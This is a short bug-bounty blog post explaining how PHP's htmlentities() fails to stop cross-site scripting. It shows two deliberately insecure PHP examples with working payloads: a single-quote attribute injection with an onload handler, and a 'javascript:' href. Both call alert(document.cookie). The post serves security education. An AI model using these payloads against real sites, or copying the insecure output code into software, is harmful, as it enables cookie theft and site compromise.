One way to bypass htmlentities
Hi researchers, it has been a long time since I have published and it is an excellent sign that I am working a lot!
The life of a bug bounty hunter is hard and we need to study a lot everyday.
I am researching deeper the options for vulnerability prevention functions and I have found some interesting things that I gradually will share them here.
There are a lof of techniques for prevention of Cross-Site Scripting and one of them for PHP is << htmlentities >>.
Many researchers when faced with this, give up for not finding a way to perform a bypass and a frustration is inevitable. When printing user input in an attribute of an HTML tag, the default configuration of htmlentities() DOES NOT protect you against XSS, when using single quotes to define the border of the tag’s attribute-value. XSS is then possible by injecting a single quote.
Let’s see:
Example01:
<?php
$_GET[‘color’] = “#000000' onload=’alert(document.cookie)”;
$body = htmlEntities($_GET[‘color’]);
print “<body bgcolor=’$body’>”;
?>

This is an insecure code and bad implementation of htmlentities.
The ‘ENT_QUOTES’ option DOES NOT PROTECT against javascript evaluation in certain tags attributes, for example: ‘href’ of the ‘a’ tag.
Example02:
<?php
$_GET[‘a’] = ‘javascript:alert(document.cookie)’;
$href = htmlEntities($_GET[‘a’], ENT_QUOTES);
print “<a href=’$href’>link</a>”;
?>


I am probing another techniques and I found interesting things that I will post here for our researchers community.
Happy Hacking fellows!
